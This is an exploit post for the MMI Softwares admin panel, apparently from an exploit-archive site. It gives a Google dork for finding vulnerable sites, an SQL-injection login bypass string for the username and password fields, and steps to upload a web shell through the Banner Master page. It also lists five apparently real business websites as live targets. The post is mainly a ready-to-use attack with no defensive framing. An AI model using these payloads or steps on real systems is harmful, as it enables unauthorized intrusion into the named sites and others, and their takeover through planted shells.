####################################
# Exploit Title: MMI Softwares admin page bypass vulnerability / upload shell
# Date: 2018-09-08
# Vendor Homepage: http://www.mmsoftwares.com/
# Exploit Author: nothing404.team
# Google Dork: intext:"Design by MMI Softwares" inurl:admin.php
# Tested on: Kali Linux
####################################
admin page:
site.com/admins/mmi-admin.php
exploit:
Username: '=''or'
password: '=''or'
Demp:
http://www.krishnagoldsindustries.com/admins/mmi-admin.php
http://www.ggchain.in/admins/admins/mmi-admin.php
http://www.jjebook.com/admins/mmi-admin.php
http://www.anuradhatextile.com/admins/mmi-admin.php
http://shalimarpalace.in/admins/mmi-admin.php
after login go to design -> Banner Master -> now you can uplaod shell
####################################
# ! We Are Nothing !
# nothing404.team@gmail.com
####################################